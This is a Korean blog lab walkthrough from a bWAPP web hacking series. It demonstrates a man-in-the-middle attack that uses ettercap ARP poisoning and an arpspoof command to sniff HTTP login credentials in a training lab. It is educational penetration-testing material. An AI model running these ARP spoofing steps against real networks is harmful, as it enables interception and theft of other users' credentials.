정보보안(구버전)/ bWAPP 2019. 2. 16. 13:14
웹 해킹 bWAPP - 76. A5 - Security Misconfiguration - Man-in-the-Middle Attack(HTTP)
본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.
1. Security Misconfiguration
- OWASP Top10 A5 - 잘못된 보안 구성
- 서버/시스템/DB/네트워크 장비/웹 설정 요류로 인하여 발생하는 취약점이다.
- Ex) 디렉토리 리스팅, 에러페이지, 웹페이지 주석, 웹서버 기본 설정, Adobe Flash 취약점, DoS/DDos 공격,
특정 서비스에 대한 Reverse_TCP 공격, 로컬 권한 취약점, 백업/임시/robots 파일
2. Man-in-the-Middle Attack
- 중간에 공격자가 사용자 패켓을 훔쳐보거나 갈취하는 스니핑 공격이다.
- Ex) ARP 스푸핑, DNS 스푸핑....
3. Security Misconfiguration - Man-in-the-Middle Attack(HTTP)
- 이 시나리오는 ARP 스푸핑을 실시하여 HTTP 로그인 정보를 스니핑하는 내용이다.
Ex1) Security Misconfiguration - Man-in-the-Middle Attack(HTTP) 이해 I
- 로컬 PC 브라우저를 이용하여 bWAPP 접속 실시
보안 레벨 선택 및 시나리오 선택
HTTP 로그인 폼 출력
'ettercap' 실행
root@kali:~# ettercap -G &
|
Sniff -> Unified sniffing -> eth1 선택 -> 확인
Hosts -> Scan for hosts
Hosts -> Host list
192.168.20.205(bWAPP) -> Add to Target 1 & 192.168.20.1(로컬 PC) -> Add to Target2
Mitm -> ARP Poisoning -> 'Sniff remote connections' 체크 -> 확인
Start -> start sniffing
로컬 PC 브라우저에서 로그인 실시(bee/bug)
로그인 성공
ettercap 스니핑 결과 확인
Ex2) Security Misconfiguration - Man-in-the-Middle Attack(HTTP) 이해 II
와이어샤크 실행
root@kali:~# wireshark & |
ARP 스푸핑 실시
root@kali:~# arpspoof -i eth1 -t 192.168.20.205 -r 192.168.20.1
|
와이어샤크 캡처 내용 확인
ARP 스푸핑 중지
0:c:29:54:f2:fb 0:c:29:5b:24:81 0806 42: arp reply 192.168.20.1 is-at 0:c:29:54:f2:fb
root@kali:~# |
[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)
웹해킹 76. A5 - bWAPP Security Misconfiguration - Man-in-the-Middle Attack(HTTP) https://youtu.be/yB1ML8AjwbI